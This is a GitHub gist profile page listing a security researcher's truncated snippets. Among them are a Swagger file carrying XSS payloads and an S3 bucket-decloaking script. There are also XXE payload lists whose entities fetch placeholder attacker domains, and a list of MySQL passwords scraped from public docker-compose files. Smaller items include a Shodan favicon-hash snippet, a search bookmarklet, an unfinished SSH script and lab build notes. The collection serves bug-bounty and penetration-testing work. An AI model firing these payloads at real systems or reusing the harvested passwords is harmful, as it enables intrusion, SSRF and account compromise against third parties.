Skip to content

Instantly share code, notes, and snippets.

Avatar

vortex (James McLean) vortexau

View GitHub Profile
View dewdwew.json
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: Swagger UI
description: "<svg/onload=alert(1)"
paths:
@vortexau
vortexau / bucket-disclose.sh
Created Oct 14, 2020 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
View bucket-disclose.sh
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@vortexau
vortexau / xxe-payloads.txt
Created Sep 24, 2020 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
View xxe-payloads.txt
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
View get-shodan-favicon-hash.py
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@vortexau
vortexau / passwords.txt
Created Sep 9, 2019 — forked from tomnomnom/passwords.txt
MySQL Docker Passwords pulled from docker-compose.yml files
View passwords.txt
!23qweASD
0Z0mQ130F65E8wD
123
1234
123456
12345678
123456789
1234root5678
123plop321
132vaslliwemvljm9
@vortexau
vortexau / google-copy.js
Created Jun 19, 2019 — forked from tomnomnom/google-copy.js
Bookmarklet to copy URLs from a Google search results page
View google-copy.js
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b)
@vortexau
vortexau / xamarin-host-ssh.py
Created Nov 7, 2017
Xamarin Mac Host SSH Connection
View xamarin-host-ssh.py
#!/usr/bin/env python
import paramiko
import base64
# Run in /mnt/c/Users/<username>/AppData/Local/Xamarin/MonoTouch
# Unfortunately this does NOT work yet, as I do not understand the passphrase.key
# file contents entirely (it appears to be bytes inside the base64 encoded string)
# and how to use it as the SSH key.
with open("passphrase.key", 'r') as file:
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View Tomcat-Struts-Lab-Build.md

Version 1

Debian installed as VM. Single Struts app, just to test the install process.

apt-get update && apt-get -y upgrade

apt-get install tomcat8 maven

cd to project directory